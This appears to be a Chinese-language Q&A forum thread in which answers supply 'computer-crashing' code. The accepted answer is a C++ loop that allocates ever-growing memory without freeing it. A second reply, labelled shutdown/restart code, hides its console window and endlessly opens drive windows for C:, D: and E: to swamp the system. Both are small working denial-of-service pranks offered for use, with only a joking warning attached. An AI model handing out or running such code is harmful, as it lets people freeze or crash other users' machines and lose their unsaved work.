0
已采纳
char * die;
long long a=1000024;
while(true)
{
die = new char[a];
a=a+1000;
}
给,不要乱用,能把电脑弄炸!
PS:
是你自己要的
0
关机重启代码
#include<bits/stdc++.h>
#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
using namespace std;
int main(int argc,char *argv[]){
ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);
int k=1;
while(k){
system("start C:");
system("start D:");
system("start E:");
}
return 0;
}
0
0
0
0